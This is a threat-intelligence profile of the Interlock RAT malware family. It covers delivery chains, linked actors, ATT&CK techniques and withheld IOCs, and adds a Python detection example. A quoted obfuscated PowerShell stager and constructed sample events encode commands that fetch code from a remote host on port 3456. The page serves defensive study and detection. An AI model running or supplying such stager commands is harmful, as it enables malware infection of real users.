Malware · Ransomware · Used by 2 actors

Interlock RAT

Interlock RAT is a stealthy, modular remote access trojan/backdoor first observed in mid-to-late 2024 and primarily associated with the Interlock ransomware ecosystem. Reporting describes it as a lightweight binary with encrypted command-and-control communications and a plugin-based architecture that allows operators to add capabilities after compromise. Its documented functions include unauthorized remote control, system reconnaissance, data exfiltration, collection of system details, network mapping, and enabling lateral movement via RDP. Related reporting also describes a broader Interlock/NodeSnake framework with implementations in PowerShell, PHP, C/C++, Java, and JavaScript for Windows and Linux, capable of fetching commands to launch a SOCKS5 proxy tunnel, spawn a reverse shell, and deliver additional payloads including Interlock ransomware and Slopoly.

Observed delivery vectors include phishing, being dropped by other malware, fake browser update chains from compromised legitimate websites impersonating Google Chrome or Microsoft Edge installers, and ClickFix/FileFix-style social engineering. In one reported KongTuke-linked campaign, compromised websites displayed fake CAPTCHA prompts that instructed users to paste attacker-provided text into the Windows Run dialog; the resulting PowerShell installed a PHP variant of Interlock RAT. That variant reportedly used Cloudflare Tunnel URLs for stealthy C2, stored itself as php.exe under AppData for persistence, collected system information, mapped networks, and supported lateral movement via RDP. Public reporting also ties Interlock RAT distribution to the KongTuke/TAG-124 traffic distribution system, which has delivered Interlock RAT variants as downstream payloads.

Interlock RAT is closely associated with the Interlock ransomware group and with activity tracked by IBM X-Force as Hive0163. Reporting also groups Interlock RAT with NodeSnake, describing NodeSnake as designed to run shell commands, establish persistence, and retrieve and launch Interlock RAT. High-confidence behaviours documented in the cited reporting include persistence establishment, outbound C2 communications, PowerShell-based staging, fake CAPTCHA/FileFix infection chains, Cloudflare Tunnel-based C2 in at least one PHP variant, storage as php.exe in AppData, and use in intrusion chains that ultimately lead to ransomware deployment.


THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers.
Hive0163

The framework has multiple implementations in PowerShell, PHP, C/C++, Java, and JavaScript to support both Windows and Linux. Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads, such as Interlock ransomware and Slopoly.

via The Hacker News (thehackernews.com)
KongTuke

...used a technique called FileFix to spread a PHP variant of Interlock RAT...

via SC World (scworld.com)
MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1189 Drive-by Compromise (evidence: 1)

Interlock employs a multi-stage attack chain, starting by compromising legitimate websites that deliver fake browser updates, such as Google Chrome or MS Edge installers.

T1566 Phishing (evidence: 1)

The malware typically arrives via phishing campaigns or is dropped by other malware strains.

Execution

4 techniques
T1059 Command and Scripting Interpreter (evidence: 1)

Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads.

T1059.001 PowerShell (evidence: 2)

powershell.exe -ep bypass -c iex (-join [char[]]@(10,105,119,114,...))

T1204.003 Malicious Image (evidence: 1)

The victim pastes and runs the command, which downloads and executes a second-stage payload.

T1559 Inter-Process Communication (evidence: 1)

ATT&CK annotation: T1559 Inter-Process Communication (tactic: Execution)

Stealth

1 technique
T1036 Masquerading (evidence: 2)

Executables Or Script Creation In Temp Path ... T1036

Discovery

1 technique
T1082 System Information Discovery (evidence: 1)

Interlock RAT is a stealthy and modular backdoor primarily used for unauthorized remote control, data exfiltration, and system reconnaissance.

Command and Control

4 techniques
T1071 Application Layer Protocol (evidence: 2)

C2 Servers (payload delivery)... port 3456 is consistent across the fleet... Additional C2s... TLSv1.0 encrypted C2... TCP backdoor.

T1090 Proxy (evidence: 1)

Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads.

T1090.003 Multi-hop Proxy (evidence: 1)

"...allow it to launch a SOCKS5 proxy tunnel..."

T1105 Ingress Tool Transfer (evidence: 2)

All samples download from http://<C2_IP>:3456/<single_letter>... The payload is saved to %APPDATA%\script.ps1, executed, then self-deleted.
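As an added defender-side example (not Mallory's or any vendor's detection content), the following Python decodes the `-join [char[]]@(...)` obfuscation quoted under T1059.001 and flags the staging behaviours described above (execution-policy bypass with iex, the port 3456 stager URL shape, php.exe under AppData, script.ps1 in %APPDATA%) against constructed process-creation events. The event field names, rule names and sample values are assumptions; 192.0.2.10 is a documentation address, not an indicator from the page.

```python
import re

# Obfuscation seen in the page's evidence: iex (-join [char[]]@(10,105,119,114,...))
CHAR_ARRAY_RE = re.compile(r"\[char\[\]\]@\(\s*([0-9,\s]+)\)", re.IGNORECASE)
# Stager download shape from the page: http://<C2_IP>:3456/<single_letter>
STAGER_URL_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}:3456/[A-Za-z](?![\w.])")

def decode_char_array(cmdline):
    """Rebuild the string that -join [char[]]@(...) produces, or None if absent."""
    m = CHAR_ARRAY_RE.search(cmdline)
    if not m:
        return None
    codes = [int(x) for x in m.group(1).replace(" ", "").split(",") if x]
    return "".join(chr(c) for c in codes)

def match_interlock_indicators(event):
    """Return rule names (this example's own) that a process-creation event matches."""
    image, cmdline, parent = (event.get(k, "") for k in ("image", "cmdline", "parent"))
    low = cmdline.lower()
    hits = []
    if "powershell" in image.lower():
        bypass = "-ep bypass" in low or "-executionpolicy bypass" in low
        if bypass and "iex" in low and CHAR_ARRAY_RE.search(cmdline):
            hits.append("powershell_charjoin_iex")
        decoded = decode_char_array(cmdline) or ""
        if STAGER_URL_RE.search(decoded) or STAGER_URL_RE.search(cmdline):
            hits.append("stager_download_port3456")
        if parent.lower().endswith("explorer.exe"):  # Win+R Run dialog launches via explorer.exe
            hits.append("powershell_from_run_dialog")
        if re.search(r"(%appdata%|\\appdata\\roaming)\\script\.ps1", low):
            hits.append("script_ps1_in_appdata")
    if re.search(r"\\appdata\\.*\\php\.exe$", image, re.IGNORECASE):
        hits.append("php_exe_in_appdata")
    return hits

def _char_array(text):  # builds the [char[]]@(...) form; used only to construct samples
    return "[char[]]@(" + ",".join(str(ord(c)) for c in text) + ")"

# Constructed sample events (assumed field names); the third is a benign vendor-path php.exe
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ep bypass -c iex (-join " + _char_array("iwr http://192.0.2.10:3456/a") + ")",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\alice\AppData\Roaming\php.exe",
     "cmdline": r"C:\Users\alice\AppData\Roaming\php.exe C:\Users\alice\AppData\Roaming\cfg.php",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Program Files\PHP\php.exe", "cmdline": "php.exe -v",
     "parent": r"C:\Windows\System32\cmd.exe"},
]
```

Run `match_interlock_indicators` over each event in your process-creation telemetry; the first sample trips three rules, the second only the AppData php.exe rule, and the benign third none.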

INDICATORS OF COMPROMISE

IOCs tracked for this family

49 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Network
47 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
2 tracked

Other indicator types observed in public reporting.

Recent sightings (indicator values are withheld on the public page): 2 URIs last seen 4 days ago; 4 domains last seen 3 months ago.